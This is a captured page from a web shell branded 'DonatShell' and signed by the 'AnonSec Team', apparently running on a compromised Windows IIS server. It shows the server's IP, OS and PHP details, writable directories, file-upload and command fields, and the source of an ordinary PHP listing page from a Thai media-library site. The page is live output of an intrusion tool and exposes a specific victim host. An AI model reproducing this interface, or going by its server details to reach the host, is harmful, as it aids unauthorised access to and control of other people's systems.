DonatShell
Server IP : 180.180.241.3  /  Your IP : 216.73.216.63
Web Server : Microsoft-IIS/7.5
System : Windows NT NETWORK-NHRC 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/AppServ/www/umedia3/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/AppServ/www/umedia3/index.viewall.php
<?php
	//$s="select * from index_db where 1 and $searchindex like '$kw%' or $searchindex like '%$kw%' ";
	$s="select * from index_db where 1  ";
	if ($acadtoviewLIMIT!="") {
		$s.=$acadtoviewLIMIT;
	}
	//echo $s;
	$showcase=tmqp($s,"index.php?mode=viewall");
	index_sepper(getlang("แสดงทั้งหมด::l::View all"));
			
	if (tmq_num_rows($showcase)!=0) {

		?><TABLE  width=100% border=0 class=mediabox cellpadding=0 cellspacing=0 >
		<TR>
			<TD><?
		while ($r=tmq_fetch_array($showcase)) {
			show_mediaicon_long(barcodeval_get("webpage-dspctrl-searchresult"),$r[mid],"show","yes",100,180,"yes");
		}
		?></TD>
		</TR>
<?		echo "$_pagesplit_btn_var";?>
	<TR>
			<TD>	<TABLE width=100% align=center cellpadding=0 cellspacing=0 >
		<TR>
			<TD><IMG SRC="<? echo $dcrURL;?>/neoimg/spacer.gif" WIDTH="140" HEIGHT="12" BORDER="0" ALT="" align=absmiddle><BR>
<IMG SRC="<? echo $dcrURL;?>neoimg/feed-icon-14x14.png" WIDTH="14" HEIGHT="14" BORDER="0" ALT="" align=absmiddle> <B style="color:<? echo $fontcolor?>" class=smaller2>Feed :</B> <A HREF="getfeed.php?feed=all" style="color:<? echo $fontcolor?>" class=smaller2 target=_blank><IMG SRC="<? echo $dcrURL;?>neoimg/feed-icon-10x10.png" WIDTH="10" HEIGHT="10" BORDER="0" ALT="" align=absmiddle> รายการทั้งหมด</A></TD>
		</TR>
		</TABLE></TD>
		</TR>
		</TABLE>
				<?
	} else {
	echo "<BR>";
		html_dialog("",getlang("ไม่พบข้อมูล::l::No results"));
	}
?>

Anon7 - 2022
AnonSec Team